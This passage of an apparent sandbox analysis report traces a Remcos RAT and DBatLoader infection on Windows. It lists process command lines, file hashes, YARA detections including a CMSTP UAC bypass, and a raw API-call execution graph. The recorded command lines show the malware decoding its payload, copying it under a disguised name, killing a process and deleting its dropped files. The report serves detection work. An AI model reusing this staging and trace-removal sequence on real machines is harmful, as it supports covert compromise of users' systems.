                                                                                                                  Path:C:\Users\Public\kn.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                                                                                                                  Imagebase:0x7ff67de30000
                                                                                                                  File size:1'651'712 bytes
                                                                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:28
                                                                                                                  Start time:21:56:15
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'465'344 bytes
                                                                                                                  MD5 hash:F83153803040CB7382CF1CC8ABEBD4C7
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001C.00000002.4509142171.0000000002891000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  Target ID:29
                                                                                                                  Start time:21:56:15
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:30
                                                                                                                  Start time:21:56:16
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:31
                                                                                                                  Start time:21:56:16
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:32
                                                                                                                  Start time:21:56:16
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Imagebase:0x7ff789bc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:21:56:16
Start date:26/04/2024
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /F /IM SystemSettings.exe
Imagebase:0x7ff636950000
File size:101'376 bytes
MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:21:56:16
Start date:26/04/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
Imagebase:0x7ff789bc0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:21:56:23
Start date:26/04/2024
Path:C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
Imagebase:0x1c0000
File size:29'184 bytes
MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:21:56:35
Start date:26/04/2024
Path:C:\Users\Public\Libraries\Kpeyvroh.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Kpeyvroh.PIF"
Imagebase:0x400000
File size:1'465'344 bytes
MD5 hash:F83153803040CB7382CF1CC8ABEBD4C7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000024.00000002.2420298425.00000000024A6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:true

Target ID:38
Start time:21:56:43
Start date:26/04/2024
Path:C:\Users\Public\Libraries\Kpeyvroh.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Kpeyvroh.PIF"
Imagebase:0x400000
File size:1'465'344 bytes
MD5 hash:F83153803040CB7382CF1CC8ABEBD4C7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Yara matches:
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000026.00000002.2505959580.0000000002841000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true


Execution Graph

Execution Coverage:5.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:32.1%
Total number of Nodes:1783
Total number of Limit Nodes:42
                                                                                                                    execution_graph 16806 7ff789bc6be0 16857 7ff789bccd90 16806->16857 16809 7ff789be41a2 16812 7ff789bc3278 166 API calls 16809->16812 16810 7ff789bc6c13 _pipe 16814 7ff789bc6c32 16810->16814 16843 7ff789bc6e26 16810->16843 16813 7ff789be41bc 16812->16813 16815 7ff789bee91c 198 API calls 16813->16815 16816 7ff789bc6df1 16814->16816 16863 7ff789bcaffc _dup 16814->16863 16817 7ff789be41c1 16815->16817 16820 7ff789bc3278 166 API calls 16817->16820 16819 7ff789bc6c7d 16819->16809 16865 7ff789bcb038 _dup2 16819->16865 16821 7ff789be41d2 16820->16821 16823 7ff789bee91c 198 API calls 16821->16823 16825 7ff789be41d7 16823->16825 16824 7ff789bc6c93 16824->16825 16867 7ff789bcd208 16824->16867 16826 7ff789bc3278 166 API calls 16825->16826 16828 7ff789be41e4 16826->16828 16830 7ff789bee91c 198 API calls 16828->16830 16829 7ff789bc6ca4 16871 7ff789bcbe00 16829->16871 16831 7ff789be41e9 16830->16831 16834 7ff789bc6ccf _get_osfhandle DuplicateHandle 16835 7ff789bc6d07 16834->16835 16836 7ff789bcb038 _dup2 16835->16836 16837 7ff789bc6d11 16836->16837 16837->16825 16838 7ff789bcd208 _close 16837->16838 16839 7ff789bc6d22 16838->16839 16840 7ff789bc6e21 16839->16840 16842 7ff789bcaffc _dup 16839->16842 16909 7ff789bee91c 16840->16909 16844 7ff789bc6d57 16842->16844 16912 7ff789bc3278 16843->16912 16844->16817 16845 7ff789bcb038 _dup2 16844->16845 16846 7ff789bc6d6c 16845->16846 16846->16825 16847 7ff789bcd208 _close 16846->16847 16848 7ff789bc6d7c 16847->16848 16849 7ff789bcbe00 647 API calls 16848->16849 16850 7ff789bc6d9c 16849->16850 16851 7ff789bcb038 _dup2 16850->16851 16852 7ff789bc6da8 16851->16852 16852->16825 16853 7ff789bcd208 _close 16852->16853 16854 7ff789bc6db9 16853->16854 16854->16840 16855 7ff789bc6dc1 16854->16855 16855->16816 16905 7ff789bc6e60 16855->16905 16858 7ff789bccda1 GetProcessHeap RtlAllocateHeap 16857->16858 16859 7ff789bdc84e 16857->16859 
16858->16859 16860 7ff789bc6c04 16858->16860 16861 7ff789bc3278 164 API calls 16859->16861 16860->16809 16860->16810 16862 7ff789bdc858 16861->16862 16864 7ff789bcb018 16863->16864 16864->16819 16866 7ff789bcb061 16865->16866 16866->16824 16868 7ff789bcd211 16867->16868 16870 7ff789bcd246 16867->16870 16869 7ff789bcd238 _close 16868->16869 16868->16870 16869->16870 16870->16829 16872 7ff789bc6cc4 16871->16872 16873 7ff789bcbe1b 16871->16873 16872->16834 16872->16835 16873->16872 16874 7ff789bcbe67 16873->16874 16875 7ff789bcbe47 memset 16873->16875 16877 7ff789bcbe73 16874->16877 16878 7ff789bcbf29 16874->16878 16895 7ff789bcbeaf 16874->16895 16988 7ff789bcbff0 16875->16988 16879 7ff789bcbe92 16877->16879 16883 7ff789bcbf0c 16877->16883 16880 7ff789bccd90 166 API calls 16878->16880 16881 7ff789bcbea1 16879->16881 16915 7ff789bcc620 GetConsoleTitleW 16879->16915 16887 7ff789bcbf33 16880->16887 16881->16895 17026 7ff789bcaf98 16881->17026 17031 7ff789bcb0d8 memset 16883->17031 16885 7ff789bcbff0 185 API calls 16885->16872 16888 7ff789bcbf70 16887->16888 16887->16895 17091 7ff789bc88a8 16887->17091 16899 7ff789bcbf75 16888->16899 17148 7ff789bc71ec 16888->17148 16889 7ff789bcbf1e 16889->16895 16892 7ff789bcbfa9 16892->16895 16896 7ff789bccd90 166 API calls 16892->16896 16895->16872 16895->16885 16898 7ff789bcbfbb 16896->16898 16898->16895 17154 7ff789bd081c GetEnvironmentVariableW 16898->17154 16901 7ff789bcb0d8 194 API calls 16899->16901 16902 7ff789bcbf7f 16901->16902 16902->16895 16959 7ff789bd5ad8 16902->16959 16907 7ff789bc6e6d 16905->16907 16906 7ff789bc6eb9 16906->16816 16907->16906 16908 7ff789bd5cb4 7 API calls 16907->16908 16908->16907 16910 7ff789bee9b4 197 API calls 16909->16910 16911 7ff789bee925 longjmp 16910->16911 16913 7ff789bc32b0 166 API calls 16912->16913 16914 7ff789bc32a4 16913->16914 16914->16809 16916 7ff789bcca2f 16915->16916 16918 7ff789bcc675 16915->16918 16917 7ff789bdc5fc GetLastError 16916->16917 16920 7ff789bc3278 166 API calls 
16916->16920 16921 7ff789bd855c ??_V@YAXPEAX 16916->16921 16917->16916 17175 7ff789bcca40 16918->17175 16920->16916 16921->16916 16922 7ff789bd291c 8 API calls 16946 7ff789bcc762 16922->16946 16923 7ff789bcc9b5 16925 7ff789bd855c ??_V@YAXPEAX 16923->16925 16924 7ff789bd855c ??_V@YAXPEAX 16924->16946 16927 7ff789bcc855 16925->16927 16926 7ff789bcc978 towupper 16951 7ff789bcc964 16926->16951 16931 7ff789bcc872 16927->16931 16935 7ff789bdc6b8 SetConsoleTitleW 16927->16935 16928 7ff789bcc69b 16928->16916 16928->16923 16928->16946 17186 7ff789bcd3f0 16928->17186 17238 7ff789bd855c 16931->17238 16933 7ff789bcc74d 16933->16946 17214 7ff789bcbd38 16933->17214 16935->16931 16937 7ff789bcc8b5 wcsncmp 16937->16933 16937->16946 16940 7ff789bcc83d 17222 7ff789bccb40 16940->17222 16943 7ff789bcc78a wcschr 16943->16946 16945 7ff789bcca25 16948 7ff789bc3278 166 API calls 16945->16948 16946->16916 16946->16922 16946->16924 16946->16940 16946->16943 16946->16945 16949 7ff789bdc684 16946->16949 16946->16951 16952 7ff789bcca2a 16946->16952 16948->16916 16950 7ff789bc3278 166 API calls 16949->16950 16950->16916 16951->16917 16951->16923 16951->16926 16951->16946 16953 7ff789bc89c0 23 API calls 16951->16953 16955 7ff789bcca16 GetLastError 16951->16955 17254 7ff789beec14 memset 16951->17254 17249 7ff789bd9158 RtlCaptureContext RtlLookupFunctionEntry 16952->17249 16953->16951 16957 7ff789bc3278 166 API calls 16955->16957 16958 7ff789bdc675 16957->16958 16958->16916 16960 7ff789bccd90 166 API calls 16959->16960 16961 7ff789bd5b12 16960->16961 16962 7ff789bccb40 166 API calls 16961->16962 16987 7ff789bd5b8b 16961->16987 16964 7ff789bd5b26 16962->16964 16963 7ff789bd8f80 7 API calls 16965 7ff789bcbf99 16963->16965 16966 7ff789bd0a6c 273 API calls 16964->16966 16964->16987 16965->16881 16967 7ff789bd5b43 16966->16967 16968 7ff789bd5bb8 16967->16968 16969 7ff789bd5b48 GetConsoleTitleW 16967->16969 16970 7ff789bd5bf4 16968->16970 16971 7ff789bd5bbd GetConsoleTitleW 16968->16971 16972 
7ff789bccad4 172 API calls 16969->16972 16973 7ff789bdf452 16970->16973 16974 7ff789bd5bfd 16970->16974 16976 7ff789bccad4 172 API calls 16971->16976 16975 7ff789bd5b66 16972->16975 16978 7ff789bd3c24 166 API calls 16973->16978 16980 7ff789bdf462 16974->16980 16981 7ff789bd5c1b 16974->16981 16974->16987 17585 7ff789bd4224 InitializeProcThreadAttributeList 16975->17585 16979 7ff789bd5bdb 16976->16979 16978->16987 17645 7ff789bc96e8 16979->17645 16985 7ff789bc3278 166 API calls 16980->16985 16984 7ff789bc3278 166 API calls 16981->16984 16982 7ff789bd5b7f 16986 7ff789bd5c3c SetConsoleTitleW 16982->16986 16984->16987 16985->16987 16986->16987 16987->16963 16989 7ff789bcc01c 16988->16989 17008 7ff789bcc0c4 16988->17008 16990 7ff789bcc086 16989->16990 16991 7ff789bcc022 16989->16991 16993 7ff789bcc144 16990->16993 16997 7ff789bcc094 16990->16997 16992 7ff789bcc030 16991->16992 16995 7ff789bcc113 16991->16995 16994 7ff789bcc039 wcschr 16992->16994 17020 7ff789bcc053 16992->17020 16996 7ff789bcc151 16993->16996 17017 7ff789bcc1c8 16993->17017 16998 7ff789bcc301 16994->16998 16994->17020 17001 7ff789bcff70 2 API calls 16995->17001 16995->17020 18626 7ff789bcc460 16996->18626 17004 7ff789bcc460 183 API calls 16997->17004 16997->17008 17002 7ff789bccd90 166 API calls 16998->17002 16999 7ff789bcc0c6 17005 7ff789bcc0cf wcschr 16999->17005 17012 7ff789bcc073 16999->17012 17000 7ff789bcc058 17010 7ff789bcff70 2 API calls 17000->17010 17000->17012 17001->17020 17025 7ff789bcc30b 17002->17025 17004->16997 17007 7ff789bcc1be 17005->17007 17005->17012 17009 7ff789bccd90 166 API calls 17007->17009 17008->16874 17009->17017 17010->17012 17011 7ff789bcc460 183 API calls 17011->17008 17012->17008 17013 7ff789bcc460 183 API calls 17012->17013 17013->17012 17014 7ff789bcc211 17019 7ff789bcff70 2 API calls 17014->17019 17015 7ff789bcc285 17015->17014 17021 7ff789bcb6b0 170 API calls 17015->17021 17016 7ff789bcb6b0 170 API calls 17016->17020 17017->17008 17017->17014 17017->17015 17022 
7ff789bcd840 178 API calls 17017->17022 17018 7ff789bcd840 178 API calls 17018->17025 17019->17008 17020->16999 17020->17000 17020->17014 17023 7ff789bcc2ac 17021->17023 17022->17017 17023->17012 17023->17014 17024 7ff789bcc3d4 17024->17012 17024->17014 17024->17016 17025->17008 17025->17014 17025->17018 17025->17024 17028 7ff789bcafb1 17026->17028 17027 7ff789bcafdb 17027->16895 17028->17027 17029 7ff789bcb038 _dup2 17028->17029 17030 7ff789bcd208 _close 17028->17030 17029->17028 17030->17028 17032 7ff789bcca40 17 API calls 17031->17032 17048 7ff789bcb162 17032->17048 17033 7ff789bcb2e1 17034 7ff789bcb303 17033->17034 17035 7ff789bcb2f7 ??_V@YAXPEAX 17033->17035 17037 7ff789bd8f80 7 API calls 17034->17037 17035->17034 17036 7ff789bcb1d9 17040 7ff789bccd90 166 API calls 17036->17040 17056 7ff789bcb1ed 17036->17056 17039 7ff789bcb315 17037->17039 17038 7ff789bd1ea0 8 API calls 17038->17048 17039->16879 17039->16889 17040->17056 17042 7ff789bdbfef _get_osfhandle SetFilePointer 17044 7ff789bdc01d 17042->17044 17042->17056 17043 7ff789bcb228 _get_osfhandle 17046 7ff789bcb23f _get_osfhandle 17043->17046 17043->17056 17047 7ff789bd33f0 _vsnwprintf 17044->17047 17045 7ff789bcaffc _dup 17045->17056 17046->17056 17050 7ff789bdc038 17047->17050 17048->17033 17048->17036 17048->17038 17048->17048 17049 7ff789bd01b8 6 API calls 17049->17056 17055 7ff789bc3278 166 API calls 17050->17055 17051 7ff789bdc1c3 17052 7ff789bd33f0 _vsnwprintf 17051->17052 17052->17050 17053 7ff789bcd208 _close 17053->17056 17054 7ff789bd26e0 19 API calls 17054->17056 17057 7ff789bdc1f9 17055->17057 17056->17033 17056->17042 17056->17043 17056->17045 17056->17049 17056->17051 17056->17053 17056->17054 17058 7ff789bdc060 17056->17058 17060 7ff789bcb038 _dup2 17056->17060 17061 7ff789bdc246 17056->17061 17066 7ff789bcb356 17056->17066 17090 7ff789bdc1a5 17056->17090 18640 7ff789bef318 _get_osfhandle GetFileType 17056->18640 17059 7ff789bcaf98 2 API calls 17057->17059 17058->17061 17064 7ff789bd09f4 2 API 
calls 17058->17064 17059->17033 17060->17056 17062 7ff789bcaf98 2 API calls 17061->17062 17065 7ff789bdc24b 17062->17065 17063 7ff789bcb038 _dup2 17067 7ff789bdc1b7 17063->17067 17068 7ff789bdc084 17064->17068 17069 7ff789bef1d8 166 API calls 17065->17069 17074 7ff789bcaf98 2 API calls 17066->17074 17070 7ff789bdc1be 17067->17070 17071 7ff789bdc207 17067->17071 17072 7ff789bcb900 166 API calls 17068->17072 17069->17033 17075 7ff789bcd208 _close 17070->17075 17073 7ff789bcd208 _close 17071->17073 17076 7ff789bdc08c 17072->17076 17073->17066 17078 7ff789bdc211 17074->17078 17075->17051 17077 7ff789bdc094 wcsrchr 17076->17077 17081 7ff789bdc0ad 17076->17081 17077->17081 17079 7ff789bd33f0 _vsnwprintf 17078->17079 17080 7ff789bdc22c 17079->17080 17082 7ff789bc3278 166 API calls 17080->17082 17081->17081 17084 7ff789bdc0e0 _wcsnicmp 17081->17084 17087 7ff789bdc106 17081->17087 17082->17033 17083 7ff789bcff70 2 API calls 17085 7ff789bdc13b 17083->17085 17084->17081 17085->17061 17086 7ff789bdc146 SearchPathW 17085->17086 17086->17061 17088 7ff789bdc188 17086->17088 17087->17083 17089 7ff789bd26e0 19 API calls 17088->17089 17089->17090 17090->17063 17092 7ff789bc88fc 17091->17092 17094 7ff789bc88cf 17091->17094 17092->16888 17095 7ff789bd0a6c 17092->17095 17093 7ff789bc88df _wcsicmp 17093->17094 17094->17092 17094->17093 17096 7ff789bd1ea0 8 API calls 17095->17096 17097 7ff789bd0ab9 17096->17097 17098 7ff789bd0b12 memset 17097->17098 17099 7ff789bd0aee _wcsnicmp 17097->17099 17100 7ff789bdd927 17097->17100 17102 7ff789bd128f ??_V@YAXPEAX 17097->17102 17101 7ff789bcca40 17 API calls 17098->17101 17099->17098 17099->17100 17104 7ff789bd081c 166 API calls 17100->17104 17103 7ff789bd0b5a 17101->17103 17106 7ff789bcb364 17 API calls 17103->17106 17118 7ff789bdd94e 17103->17118 17105 7ff789bdd933 17104->17105 17105->17098 17105->17102 17107 7ff789bd0b6f 17106->17107 17107->17102 17109 7ff789bd0b8c wcschr 17107->17109 17113 7ff789bd0c0f wcsrchr 17107->17113 17116 7ff789bd081c 
166 API calls 17107->17116 17107->17118 17122 7ff789bcd3f0 223 API calls 17107->17122 17123 7ff789bd3060 171 API calls 17107->17123 17125 7ff789bd0d71 wcsrchr 17107->17125 17127 7ff789bccd90 166 API calls 17107->17127 17128 7ff789bd1ea0 8 API calls 17107->17128 17130 7ff789bd0fb1 wcsrchr 17107->17130 17131 7ff789bd2eb4 22 API calls 17107->17131 17132 7ff789bd0fd0 wcschr 17107->17132 17135 7ff789bd10fd wcsrchr 17107->17135 17144 7ff789bd1087 _wcsicmp 17107->17144 17146 7ff789bdda74 17107->17146 18641 7ff789bd3bac 17107->18641 18645 7ff789bd291c GetDriveTypeW 17107->18645 18648 7ff789bd2efc 17107->18648 18662 7ff789bcaf74 17107->18662 17108 7ff789bdd96b ??_V@YAXPEAX 17108->17118 17109->17107 17112 7ff789bdd99a wcschr 17112->17118 17113->17107 17113->17118 17114 7ff789bdda64 17115 7ff789bdd9ca GetFileAttributesW 17115->17114 17115->17118 17116->17107 17117 7ff789bdda90 GetFileAttributesW 17117->17118 17119 7ff789bddaa8 GetLastError 17117->17119 17118->17108 17118->17112 17118->17114 17118->17115 17120 7ff789bdd9fd ??_V@YAXPEAX 17118->17120 17119->17114 17121 7ff789bddab9 17119->17121 17120->17118 17121->17118 17122->17107 17123->17107 17125->17107 17126 7ff789bd0d97 NeedCurrentDirectoryForExePathW 17125->17126 17126->17107 17126->17118 17127->17107 17128->17107 17130->17107 17130->17132 17131->17107 17132->17114 17133 7ff789bd0fed wcschr 17132->17133 17133->17107 17133->17114 17135->17107 17136 7ff789bd111a _wcsicmp 17135->17136 17137 7ff789bd123d 17136->17137 17138 7ff789bd1138 _wcsicmp 17136->17138 17140 7ff789bd1250 ??_V@YAXPEAX 17137->17140 17141 7ff789bd1175 17137->17141 17138->17137 17139 7ff789bd10c5 17138->17139 17139->17141 17142 7ff789bd1169 ??_V@YAXPEAX 17139->17142 17140->17141 17143 7ff789bd8f80 7 API calls 17141->17143 17142->17141 17145 7ff789bd1189 17143->17145 17144->17146 17147 7ff789bd10a7 _wcsicmp 17144->17147 17145->16888 17146->17114 17146->17117 17147->17139 17147->17146 17149 7ff789bc7279 17148->17149 17150 7ff789bc7211 _setjmp 17148->17150 
ReleaseSRWLockShared 18204->18205 18206 7ff789bd005d 18204->18206 18207 7ff789bd0190 18205->18207 18208 7ff789bd00bb 18205->18208 18206->18205 18207->18170 18208->18207 18209 7ff789bd0167 MultiByteToWideChar 18208->18209 18210 7ff789bdd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18208->18210 18211 7ff789bd0131 SetFilePointer 18208->18211 18209->18207 18210->18207 18211->18208 18214 7ff789bdd55c 18213->18214 18215 7ff789bcfc6a 18213->18215 18216 7ff789bc3278 166 API calls 18214->18216 18217 7ff789bdd571 memset longjmp 18215->18217 18230 7ff789bcfca2 18215->18230 18218 7ff789bdd566 18216->18218 18219 7ff789bcfce7 18217->18219 18218->18217 18219->18155 18220 7ff789bcfd73 18221 7ff789bdd638 18220->18221 18222 7ff789bcfd99 18220->18222 18223 7ff789bc3278 166 API calls 18221->18223 18224 7ff789bcff70 2 API calls 18222->18224 18225 7ff789bdd64c 18223->18225 18226 7ff789bcfda1 18224->18226 18227 7ff789bcff70 2 API calls 18225->18227 18226->18155 18228 7ff789bdd654 longjmp 18227->18228 18232 7ff789bcff4f 18228->18232 18230->18219 18230->18220 18230->18232 18233 7ff789bdd609 18230->18233 18238 7ff789bdd5b5 memmove 18230->18238 18316 7ff789bd18d4 18230->18316 18390 7ff789bcd840 GetProcessHeap HeapAlloc 18230->18390 18234 7ff789bd0167 MultiByteToWideChar 18232->18234 18235 7ff789bdd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18232->18235 18237 7ff789bd0131 SetFilePointer 18232->18237 18236 7ff789bc3278 166 API calls 18233->18236 18242 7ff789bd0190 18234->18242 18235->18242 18240 7ff789bdd615 18236->18240 18237->18232 18243 7ff789bc3278 166 API calls 18238->18243 18241 7ff789bcff70 2 API calls 18240->18241 18244 7ff789bdd61f longjmp 18241->18244 18242->18155 18245 7ff789bdd5e6 18243->18245 18244->18221 18246 7ff789bcff70 2 API calls 18245->18246 18247 7ff789bdd5f0 longjmp 18246->18247 18247->18233 18248->18170 18421 7ff789be8450 GetFileType 18249->18421 18252 7ff789bebf6b GetLastError 18253 7ff789bebf62 18253->18175 18255 7ff789be7f6b 18254->18255 18256 
7ff789be7f59 _get_osfhandle 18254->18256 18257 7ff789be83df AcquireSRWLockShared ReadConsoleW ReleaseSRWLockShared 18255->18257 18260 7ff789be7f97 GetConsoleScreenBufferInfo 18255->18260 18256->18255 18258 7ff789be80f6 18257->18258 18259 7ff789bd8f80 7 API calls 18258->18259 18261 7ff789be8432 18259->18261 18260->18257 18262 7ff789be7fb2 18260->18262 18261->18170 18427 7ff789bf1398 18262->18427 18264 7ff789be7ff8 AcquireSRWLockShared ReadConsoleW ReleaseSRWLockShared 18281 7ff789be7fe0 18264->18281 18266 7ff789be80d1 18266->18258 18267 7ff789be80d6 GetProcessHeap RtlFreeHeap 18266->18267 18267->18258 18268 7ff789be8061 GetProcessHeap RtlFreeHeap 18268->18281 18270 7ff789be8168 _wcsnicmp 18271 7ff789be818b _wcsnicmp 18270->18271 18270->18281 18272 7ff789be81ae _wcsnicmp 18271->18272 18271->18281 18273 7ff789be81cd _wcsnicmp 18272->18273 18272->18281 18275 7ff789be81ec _wcsnicmp 18273->18275 18273->18281 18277 7ff789be820b _wcsnicmp 18275->18277 18275->18281 18279 7ff789be822a _wcsnicmp 18277->18279 18277->18281 18278 7ff789be82a1 SetConsoleCursorPosition FillConsoleOutputCharacterW WriteConsoleW 18282 7ff789bd0580 12 API calls 18278->18282 18279->18281 18281->18264 18281->18266 18281->18268 18281->18270 18283 7ff789be8364 GetProcessHeap RtlFreeHeap 18281->18283 18284 7ff789be8391 GetProcessHeap HeapAlloc 18281->18284 18432 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 18281->18432 18433 7ff789bf10d8 18281->18433 18444 7ff789bef22c _get_osfhandle GetConsoleMode 18281->18444 18282->18281 